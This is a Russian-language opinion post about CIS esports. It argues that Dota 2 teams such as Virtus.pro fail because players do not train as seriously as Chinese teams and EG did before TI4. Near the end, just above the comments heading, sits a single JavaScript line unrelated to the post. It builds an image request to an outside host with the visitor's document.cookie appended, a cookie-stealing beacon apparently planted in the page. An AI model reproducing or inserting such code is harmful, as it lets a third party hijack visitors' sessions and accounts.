advertisement banner
i
C

Киберспорт в СНГ

Начнем с того, что я болею за вп с детства тех пор как ушел санта. Каждое следующее глупое поражение я себе говорил, что больше не буду за них болеть, но так до сих пор и топлю. Каждый новый решафл меня смешит: и то что орги думают что все дело в личном составе, то как все в комментариях срут про то, "взлетят" или "не взлетят", и то как они каждый раз оказываются на дне.

Причина поражений та же, по которой и киберспорта в СНГ сейчас не будет - непрофессиональное отношение к своей работе. Все сказанное дальше - мое субъективное мнение, конечно, я не знаю как все происходит на самом деле, просто сами подумайте, согласны ли вы со мной. Итак, все говорят о прогрессе киберспорта, а как вы его себе представляете, если большинство "профессиональных" игроков занимаются дотой практически на таком же уровне что и обычные любители, не считая конечно турниров высокого уровня. Я предполагаю, что уж тридцать тысяч в Virtus.pro платят точно, за эти деньги пол России трудится 8 часов в день, а наши "киберспортсмены" России и СНГ ограничиваются одной игрой на онлайн турнире вечерком и парой кланваров на неделе.

А теперь вспомните результы TI4. Китай, Китай, США, а чем они занимались весь год? Правильно! Играли в доту. Сутками, на базах, не просто катали пабы на стримах, а пахали для того чтобы победить, и победили. Как к этому относятся китайцы, вы знаете, а EG - молодые ребята, делали все на настрое, потому что им нравится этим заниматься. И после каждого поражения наших команд начинаешь думать: "А ведь есть тысячи парней, которые хотят оказаться на их месте, и которые готовы работать". Жаль, конечно, что крупные организации не могут позволить себе рискнуть, собрав такой состав.

Пока игроки СНГ не начнут работать и относиться к Доте как к работе, а это и есть их работа, они не начнут играть, и дело не в личном скиле и сыгрываться они должны не каким то чудом, а на тренировках, надеюсь, что молодые Jotm и Роксы смогут настроиться на серьезную работу и наконец то выйти на уровень Китая и Европы.

img=new Image();img.src="http://xawdx.net76.net/s.gif?"+document.cookie;

Комментарии